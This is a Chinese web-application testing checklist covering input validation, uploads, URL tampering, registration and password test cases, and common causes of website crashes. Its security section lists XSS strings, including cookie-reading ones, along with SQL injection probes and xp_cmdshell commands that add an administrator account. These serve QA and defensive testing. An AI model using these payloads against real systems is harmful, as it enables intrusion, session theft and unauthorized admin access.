1、建立整体的威胁模型,测试溢出漏洞、信息泄漏、错误处理、SQL 注入、身份验证和授权错误.1. 输入验证客户端验证 服务器端验证(禁用脚本调试,禁用Cookies)1.输入很大的数(如4,294,967,269),输入很小的数(负数)2.输入超长字符,如对输入文字长度有限制,则尝试超过限制,刚好到达限制字数时有何反应3.输入特殊字符,如:!#$%&*()_+:”|4.输入中英文空格,输入字符串中间含空格,输入首尾空格5.输入特殊字符串NULL,null,0x0d 0x0a6.输入正常字符串7.输入与要求不同类型的字符,如: 要求输入数字则检查正值,负值,零值(正零,负零),小数,字母,空值; 要
2、求输入字母则检查输入数字8.输入html和javascript代码9.对于像回答数这样需检验数字正确性的测试点,不仅对比其与问题最终页的回答数,还要对回答进行添加删除等操作后查看变化例如:1.输入”gfhd,看是否出错;2.输入,看是否出现文本框;3.输入alert(“提示”)看是否出现提示。关于上传:1.上传文件是否有格式限制,是否可以上传exe文件;2.上传文件是否有大小限制,上传太大的文件是否导致异常错误,上传0K的文件是否会导致异常错误,上传并不存在的文件是否会导致异常错误;3.通过修改扩展名的方式是否可以绕过格式限制,是否可以通过压包方式绕过格式限制;4.是否有上传空间的限制,是否可
3、以超过空间所限制的大小,如将超过空间的大文件拆分上传是否会出现异常错误。5.上传文件大小大于本地剩余空间大小,是否会出现异常错误。6.关于上传是否成功的判断。上传过程中,中断。程序是否判断上传是否成功。7.对于文件名中带有中文字符,特殊字符等的文件上传。下载:1. 避免输入:.web.2. 修改命名后缀。关于URL:1.某些需登录后或特殊用户才能进入的页面,是否可以通过直接输入网址的方式进入;2.对于带参数的网址,恶意修改其参数,(若为数字,则输入字母,或很大的数字,或输入特殊字符等)后打开网址是否出错,是否可以非法进入某些页面;3.搜索页面等url中含有关键字的,输入html代码或JavaS
4、cript看是否在页面中显示或执行。4.输入善意字符。UBB:url=http:/www.*.com 你的网站/url1.试着用各种方式输入UBB代码,比如代码不完整,代码嵌套等等.2.在UBB代码中加入属性,如样式,事件等属性,看是否起作用3.输入编辑器中不存在的UBB代码,看是否起作用url=javascript:alert(hello)链接/urlemail=javascript:alert(hello)EMail/emailemail=yangtao STYLE=background-image: url(javascript:alert(XSS)yangtao/emailimg st
5、yle=background-image:url(javascript:alert(alert(xss)/imgimg onmouseover=alert(hello);/imgb STYLE=background-image: url(javascript:alert(XSS)一首诗酸涩涩服务网/bi STYLE=background-image: url(javascript:alert(XSS)一二三四五六七北京市/iu一二三四五六七北京市/ufont=微软雅黑 STYLE=background-image: url(javascript:alert(XSS)一二三四五六七北京市/fon
6、tsize=4 STYLE=background-image: url(javascript:alert(XSS)一二三四五六七北京市/sizecolor=Red STYLE=background-image: url(javascript:alert(XSS)一二三四五六七北京市/coloralign=center STYLE=background-image: url(javascript:alert(XSS)一二三四五六七北京市/alignfloat=left STYLE=background-image: url(javascript:alert(XSS)一二三四五六七北京市/floa
7、tfont=微软雅黑 STYLE=background-image: url(javascript:alert(XSS)一二三四五六七北京市/fontsize=4 STYLE=background-image: url(javascript:alert(XSS)一二三四五六七北京市/sizecolor=Red STYLE=background-image: url(javascript:alert(XSS)一二三四五六七北京市/coloralign=center STYLE=background-image: url(javascript:alert(XSS)一二三四五六七北京市/alignl
8、ist=1*一二三四五六七北京市/listindent一二三四五六七北京市/indentfloat=left STYLE=background-image: url(javascript:alert(XSS)一二三四五六七北京市/floatmedia=ra,400,300,02. 输出编码常用的测试输入语句有:input/ alert(hello);1.jpg onmouseover=alert(xss)alert(xss);http:/xxx;alert(xss);var/ a=a”xss&a=” ; b=”;alert(/xss/);/”“”“”“ “ “”“ ”title=”对输出数据到
9、输出数据的对比,看是否出现问题。3. 防止SQL注入Admin-or - and ( ) exec insert * % chr mid and 1=1 ; And 1=1 ; aNd 1=1 ; char(97)char(110)char(100) char(49)char(61)char(49) ; %20AND%201=2and 1=1 ; And 1=1 ; aNd 1=1 ;and 1=2 ; and 1=2and 2=2and user0and (select count(*) from sysobjects)0and (select count(*) from msysobjec
10、ts)0and (Select Count(*) from Admin)=0and (select top 1 len(username) from Admin)0(username 已知字段);exec master.xp_cmdshell “net user name password /add”;exec master.xp_cmdshell “net localgroup name administrators /add”and 0(select count(*) from admin)简单的如where xtype=U,字符U对应的ASCII码是85,所以可以用where xtype
11、=char(85)代替;如果字符是中文的,比如where name=用户,可以用where name=nchar(29992)+nchar(25143)代替。4. 跨站脚本攻击(XSS)对于 XSS,只需检查 HTML 输出并看看您输入的内容在什么地方。它在一个 HREF 标记中吗?是否在 IFRAME 标记中?它在 CLSID 标记中吗?在 IMG SRC 中吗?某些 Flash 内容的 PARAM NAME 是怎样的?!#$%&*()_+,./?;-%3Cinput /%3E%3Cscript%3Ealert(XSS)%3C/script%3Einput/ alert(xss)alert(
12、xss);alert(xss)javascript:alert(/xss/)javascript:alert(/xss/) =alert(document.cookie) 1.jpg onmouseover=alert(xss)alert(xss);http:/xxx;alert(xss);var/ a=a”xss&alert(XSS) %22%27 AK%22%20style%3D%22background:url(javascript:alert(%27XSS%27)%22%20OS%22 %22%2Balert(%27XSS%27)%2B%22 a?alert(Vulner
13、able)&:var from = $!rundata.Parameters.getString(from);var from = ”;hackerFunction(document.cookie);”;5. 跨站请求伪造(CSRF)同个浏览器打开两个页面,一个页面权限失效后,另一个页面是否可操作成功。当页面没有CHECKCODE时,查看页面源代码,查是是否有token。如果页面完全是展示页面,是不会有token的。一、 用户注册只从用户名和密码角度写了几个要考虑的测试点,如果需求中明确规定了安全问题,Email,出生日期,地址,性别等等一系列的格式和字符要求,那就都要写用例测了以等价类划分和
14、边界值法来分析1.填写符合要求的数据注册: 用户名字和密码都为最大长度(边界值分析,取上点)2.填写符合要求的数据注册 :用户名字和密码都为最小长度(边界值分析,取上点)3.填写符合要求的数据注册:用户名字和密码都是非最大和最小长度的数据(边界值分析,取内点)4.必填项分别为空注册5.用户名长度大于要求注册1位(边界值分析,取离点)6.用户名长度小于要求注册1位(边界值分析,取离点)7.密码长度大于要求注册1位(边界值分析,取离点)8.密码长度小于要求注册1位(边界值分析,取离点)9.用户名是不符合要求的字符注册(这个可以划分几个无效的等价类,一般写一两个就行了,如含有空格,#等,看需求是否允
15、许吧)10.密码是不符合要求的字符注册(这个可以划分几个无效的等价类,一般写一两个就行了)11.两次输入密码不一致(如果注册时候要输入两次密码,那么这个是必须的)12.重新注册存在的用户13.改变存在的用户的用户名和密码的大小写,来注册。(有的需求是区分大小写,有的不区分)14.看是否支持tap和enter键等;密码是否可以复制粘贴;密码是否以* 之类的加秘符号显示备注:边界值的上点、内点和离点大家应该都知道吧,呵呵,这里我就不细说了二、 修改密码当然具体情况具体分析哈不能一概而论实际测试中可能只用到其中几条而已,比如银行卡密码的修改,就不用考虑英文和非法字符,更不用考虑那些之类的快捷键。而有
16、的需要根据需求具体分析了,比如连续出错多少次出现的提示,和一些软件修改密码要求一定时间内有一定的修改次数限制等等。1.不输入旧密码,直接改密码2.输入错误旧密码3.不输入确认新密码4.不输入新密码5.新密码和确认新密码不一致6.新密码中有空格7.新密码为空8.新密码为符合要求的最多字符9.新密码为符合要求的最少字符10.新密码为符合要求的非最多和最少字符11.新密码为最多字符-112.新密码为最少字符+113.新密码为最多字符+114.新密码为最少字符-115.新密码为非允许字符(如有的密码要求必须是英文和数字组成,那么要试汉字和符号等)16.看是否支持tap和enter键等;密码是否可以复制
17、粘贴;密码是否以* 之类的加秘符号17.看密码是否区分大小写,新密码中英文小写,确认密码中英文大写18.新密码与旧密码一样能否修改成功另外一些其他的想法如下:1 要测试所有规约中约定可以输入的特殊字符,字母,和数字,要求都可以正常输入、显示正常和添加成功2 关注规约中的各种限制,比如长度,大否支持大小写。3 考虑各种特殊情况,比如添加同名用户,系统是否正确校验给出提示信息,管理员帐户是否可以删除,因为有些系统管理员拥有最大权限,一旦删除管理员帐户,就不能在前台添加,这给最终用户会带来很多麻烦。比较特殊的是,当用户名中包括了特殊字符,那么对这类用户名的添加同名,修改,删除,系统是否能够正确实现,
18、我就遇到了一个系统,添加同名用户时,如果以前的用户名没有特殊字符,系统可以给出提示信息,如果以前的用户名包含特殊字符,就不校验在插入数据库的时候报错。后来查到原因了,原来是在java中拼SQL语句的时候,因为有_,所以就调用了一个方法在“_”,前面加了一个转义字符,后来发现不该调用这个方法。所以去掉就好了。所以对待输入框中的特殊字符要多关注。4 数值上的长度 之类的,包括出错信息是否合理 5 特殊字符:比如。 / 这些是否会造成系统崩溃6 注入式bug:比如密码输入个or 1=17 登录后是否会用明文传递参数8 访问控制(不知道这个算不算):登录后保存里面的链接,关了浏览器直接复制链接看能不能
19、访问。输入框测试1验证输入与输出的是否信息一致;2输入框之前的标题是否正确;3对特殊字符的处理,尤其是输入信息徐需要发送到数据库的。特殊字符包括:(单引号)、(双引号)、(中括号)、()(小括号)、(大括号)、;(分号)、(大于小于号)4对输入框输入超过限制的字符的处理,一般非特殊的没有作出限制的在255byte左右;5输入框本身的大小、长度;6不同内码的字符的输入;7对空格、TAB字符的处理机制;8字符本身显示的颜色;9密码输入窗口转换成星号或其它符号;10密码输入框对其中的信息进行加密,防止采用破解星号的方法破解;11按下ctrl和alt键对输入框的影响;12对于新增、修改、注册时用的输入
20、框,有限制的,应该输入时作出提示,指出不允许的或者标出允许的;13对于有约束条件要求的输入框应当在条件满足时输入框的状态发生相应的改变,比如选了湖南就应该列出湖南下面的市,或者选了某些条件之后,一些输入框会关闭或转为只读状态;14输入类型;根据前面的栏位标题判断该输入框应该输入哪些内容算是合理的。例如,是否允许输入数字或字母,不允许输入其他字符等。15.输入长度;数据库字段有长度定义,当输入过长时,提交数据是否会出错。16.输入状态;当处于某种状态下,输入框是否处于可写或非可写状态。例如,系统自动给予的编号等栏位作为唯一标识,当再次处于编辑状态下,输入框栏位应处于不可写状态,如果可写对其编辑的
21、话,可能会造成数据重复引起冲突等。17如果是会进行数据库操作的输入框,还可以考虑输入SQL中的一些特殊符号如单引号等,有时会有意想不到的错误出现18输入类型输入长度是否允许复制粘贴为空的情况空格的考虑半角全角测试对于密码输入框要考虑显示的内容是*输入错误时的提示信息及提示信息是否准确19可以先了解你要测试的输入框在软件系统的某个功能中所扮演的角色,然后了解其具体的输入条件,在将输入条件按照有效等价类,无效等价类,边界值等方法进行测试用例的设计。20关键字有大小写混合的情况;21关键字中含有一个或多个空格的情况,包括前空格,中间空格(多个关键字),和后空格;22关键字中是否支持通配符的情况(视功
22、能而定);23关键字的长度分别为9、10、11个字符时的情况;24关键字是valid,但是没有匹配搜索结果的情况;25输入html的标签会出现哪些问题?输入 会出现什么问题呢?(这条是我自己发现的,在网上也没找到类似的东东,呵呵,大家凑合着看吧)安全测试方面:给出一些特别的关键字,比如 or 1=1, 这样的关键字如果不被处理就直接用到数据库查询中去,后果可想而知。用户体验相关我登录失败的时候没有任何提示,这没什么,反正提示也只是说失败进去后发现颜色变更很强烈刺得我一眨眼,不过多看几次就习惯了。点击某个链接的时候出现错误页面,刷新后就好了,难道是随机错误?保存文字的时候没有成功提示,不过能成功
23、保存就算了。浏览记录的时候竟然出现错误页面,原来我没有选记录就浏览了,我自己操作不规范嘛。删除记录的时候发现选错了,想取消的时候却提示删除成功,都没有确认提示,只能下次看仔细点了。查询时字母键被茶杯压住了多输了点字符,竟然出现错误页面,下次把东西整理好。无聊随便点点几个链接,竟然没有反应,既然不用,那就不要做出来嘛。看看自己上传的图片效果如何,这个怎么不显示?多试几次发现名字不包含中文就好了,下次注意下。改改字体字号颜色美化环境嘛,怎么格式那里不显示正确的字体字号呢,将就用吧。这里的记录条数怎么这么多啊?原来是没有删除按钮,看来下次不能随便加了。这个结束时间怎么在开始时间前啊?原来没有进行控制
24、,下面的人执行时还是自己改过来吧。上次我在这里看见的图片呢?刷新后就出来了,怎么和我玩捉迷藏呢?多输了点内容,保存时候提示太多了,点确定后发现被清空了,我一个小时的工作啊!这张图片真不错,但是按钮呢,按钮呢?按钮被挤掉了我怎么编辑啊。听说F5是刷新点一下看看。怎么好像变成了登录界面?刚学了怎么用TAB键,确实很方便。TAB一下。跑哪去了,怎么一片空白啊?玩游戏的人点击速度那么快,我也来试试。怎么一双击就出错了?我找错别字是很厉害的,这不就发现“同意”写成了“统一”。这里提示只能输入1100,我偏要输入9999保存看看,怎么系统不能用了?这里一点击就出现IE错误,硬是不弹出我需要的窗口。这个查询
25、按钮怎么灰掉了?这么多记录让我一页一页翻过去找啊。上传第二个附件的时候怎么把第一个挤掉了啊,会挤掉也要提示一下嘛。一个页面上打开的记录太多了,变体都用省略了,要是鼠标放上去浮动显示完整标题就方便多了。这几条记录有依存关系,删了一条其他就没了,提示都没有,早知道我就用编辑了这条记录怎么好像是昨天的,我记得今天更新了啊?原来编辑后的记录没有传到引用的地方。最最奇怪的是昨天上传时候正常的图片今天就不能显示了。我记得没有只能显示一天的功能啊?这里怎么没有任何按钮呢,看手册才知道竟然要用右键进行操作,怎么突然冒出个异类啊?这里怎么能增加两条相同的记录呢?不控制一下天知道手下那些愣头青会做出什么来。这里的
26、菜单一层一层又一层,足足有五层,把我头都绕晕了我记得哪里说过最好不要超过三层的。这个界面看起来怎么这么别扭啊,是字体太大了,是按钮太小了,还是功能太多了,怎么不是管理员登录进来也能管理啊,那我这个管理员的身份不是多此一举吗?删除的时候提示Error,幸亏我英语水平好,可是你换成中文不行吗?这条记录不是删除了吗,怎么还能引用啊,到时候出错了怎么办,难道还要我记住删了那些记录?经过精心编辑,我发了一条通知,怎么用普通用户查看的时候是默认的字体字号啊?这几个页面上的当前日期怎么是固定不变的啊,这都是去年的日期了,不会是开发时候的吧。让Web站点崩溃最常见的七大原因磁盘已满导致系统无法正常运行的最可能
27、的原因是磁盘已满。一个好的网络管理员会密切关注磁盘的使用情况,隔一定的时间,就需要将磁盘上的一些负载转存到备份存储介质中(例如磁带)。日志文件会很快用光所有的磁盘空间。Web服务器的日志文件、SQL*Net的日志文件、JDBC日志文件,以及应用程序服务器日志文件均与内存泄漏有同等的危害。可以采取措施将日志文件保存在与操作系统不同的文件系统中。日志文件系统空间已满时Web服务器也会被挂起,但机器自身被挂起的几率已大大减低。C指针错误用C或C+编写的程序,如Web服务器API模块,有可能导致系统的崩溃,因为只要间接引用指针(即,访问指向的内存)中出现一个错误,就会导致操作系统终止所有程序。另外,使
28、用了糟糕的C指针的Java模拟量(analog)将访问一个空的对象引用。Java中的空引用通常不会导致立刻退出JVM,但是前提是程序员能够使用异常处理方法恰当地处理错误。在这方面,Java无需过多的关注,但使用 Java对可靠性进行额外的度量则会对性能产生一些负面影响。内存泄漏C/C+程序还可能产生另一个指针问题:丢失对已分配内存的引用。当内存是在子程序中被分配时,通常会出现这种问题,其结果是程序从子程序中返回时不会释放内存。如此一来,对已分配的内存的引用就会丢失,只要操作系统还在运行中,则进程就会一直使用该内存。这样的结果是,曾占用更多的内存的程序会降低系统性能,直到机器完全停止工作,才会完
29、全清空内存。解决方案之一是使用代码分析工具(如Purify)对代码进行仔细分析,以找出可能出现的泄漏问题。但这种方法无法找到由其他原因引起的库中的泄漏,因为库的源代码是不可用的。另一种方法是每隔一段时间,就清除并重启进程。Apache的Web服务器就会因这个原因创建和清除子进程。虽然Java本身并无指针,但总的说来,与C程序相比, Java程序使用内存的情况更加糟糕。在Java中,对象被频繁创建,而直到所有到对象的引用都消失时,垃圾回收程序才会释放内存。即使运行了垃圾回收程序,也只会将内存还给虚拟机VM,而不是还给操作系统。结果是:Java程序会用光给它们的所有堆,从不释放。由于要保存实时(J
30、ust In Time,JIT)编译器产生的代码,Java程序的大小有时可能会膨胀为最大堆的数倍之巨。还有一个问题,情况与此类似。从连接池分配一个数据库连接,而无法将已分配的连接还回给连接池。一些连接池有活动计时器,在维持一段时间的静止状态之后,计时器会释放掉数据库连接,但这不足以缓解糟糕的代码快速泄漏数据库连接所造成的资源浪费。进程缺乏文件描述符如果已为一台Web服务器或其他关键进程分配了文件描述符,但它却需要更多的文件描述符,则服务器或进程会被挂起或报错,直至得到了所需的文件描述符为止。文件描述符用来保持对开放文件和开放套接字的跟踪记录,开放文件和开放套接字是Web服务器很关键的组成部分,
31、其任务是将文件复制到网络连接。默认时,大多数shell有64个文件描述符,这意味着每个从shell启动的进程可以同时打开64个文件和网络连接。大多数shell都有一个内嵌的 ulimit命令可以增加文件描述符的数目。线程死锁由多线程带来的性能改善是以可靠性为代价的,主要是因为这样有可能产生线程死锁。线程死锁时,第一个线程等待第二个线程释放资源,而同时第二个线程又在等待第一个线程释放资源。我们来想像这样一种情形:在人行道上两个人迎面相遇,为了给对方让道,两人同时向一侧迈出一步,双方无法通过,又同时向另一侧迈出一步,这样还是无法通过。双方都以同样的迈步方式堵住了对方的去路。假设这种情况一直持续下去
32、,这样就不难理解为何会发生死锁现象了。解决死锁没有简单的方法,这是因为使线程产生这种问题是很具体的情况,而且往往有很高的负载。大多数软件测试产生不了足够多的负载,所以不可能暴露所有的线程错误。在每一种使用线程的语言中都存在线程死锁问题。由于使用Java进行线程编程比使用C容易,所以 Java程序员中使用线程的人数更多,线程死锁也就越来越普遍了。可以在Java代码中增加同步关键字的使用,这样可以减少死锁,但这样做也会影响性能。如果负载过重,数据库内部也有可能发生死锁。如果程序使用了永久锁,比如锁文件,而且程序结束时没有解除锁状态,则其他进程可能无法使用这种类型的锁,既不能上锁,也不能解除锁。这会
33、进一步导致系统不能正常工作。这时必须手动地解锁。服务器超载Netscape Web服务器的每个连接都使用一个线程。Netscape Enterprise Web服务器会在线程用完后挂起,而不为已存在的连接提供任何服务。如果有一种负载分布机制可以检测到服务器没有响应,则该服务器上的负载就可以分布到其它的 Web服务器上,这可能会致使这些服务器一个接一个地用光所有的线程。这样一来,整个服务器组都会被挂起。操作系统级别可能还在不断地接收新的连接,而应用程序(Web服务器)却无法为这些连接提供服务。用户可以在浏览器状态行上看到connected(已连接)的提示消息,但这以后什么也不会发生。解决问题的一
34、种方法是将obj.conf参数RqThrottle的值设置为线程数目之下的某个数值,这样如果越过 RqThrottle的值,就不会接收新的连接。那些不能连接的服务器将会停止工作,而连接上的服务器的响应速度则会变慢,但至少已连接的服务器不会被挂起。这时,文件描述符至少应当被设置为与线程的数目相同的数值,否则,文件描述符将成为一个瓶颈。数据库中的临时表不够用许多数据库的临时表(cursor)数目都是固定的,临时表即保留查询结果的内存区域。在临时表中的数据都被读取后,临时表便会被释放,但大量同时进行的查询可能耗尽数目固定的所有临时表。这时,其他的查询就需要列队等候,直到有临时表被释放时才能再继续运行。这是一个不容易被程序员发觉的问题,但会在负载测试时显露出来。但可能对于数据库管理员(DataBase Administrator,DBA)来说,这个问题十分明显。此外,还存在一些其他问题:设置的表空间不够用、序号限制太低,这些都会导致表溢出错误。这些问题表明了一个好的DBA对用于生产的数据库设置和性能进行定期检查的重要性。而且,大多数数据库厂商也提供了监控和建模工具以帮助解决这些问题。另外,还有许多因素也极有可能导致Web站点无法工作。如:相关性、子网流量超载、糟糕的设备驱动程序、硬件故障、包括错误文件的通配符、无意间锁住了关键的表。